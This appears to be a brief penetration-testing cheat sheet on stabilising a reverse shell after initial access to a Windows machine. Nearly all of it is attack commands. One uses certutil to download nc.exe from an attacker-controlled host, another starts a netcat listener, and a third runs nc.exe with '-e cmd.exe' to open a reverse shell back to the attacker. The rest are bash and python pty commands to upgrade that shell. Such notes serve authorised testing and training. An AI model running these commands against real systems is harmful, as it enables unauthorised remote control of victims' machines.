Once we get an initial access with a reverse shell, we can stabilize it by downloading netcat (nc) to the victim machine (if it does not already exist) and run a reverse shell:
Download nc from attacker machine:
certutil.exe -f -urlcache http://<ip.of.attacker.machine>:<port>/nc.exe nc.exe
Then start a listener on attacker machine:
nc -lnvp <port>
Run a reverse shell:
./nc.exe <ip.of.attacker.machine> <port> -e 'cmd.exe'
Assure that you are running in BASH. To temporarily switch to a bash shell, run the following command in your terminal:
exec bash --login
You can confirm if you're using bash by running:
ps -p $$
In the terminal which uses bash, run the listener and run the commands to upgrade the shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'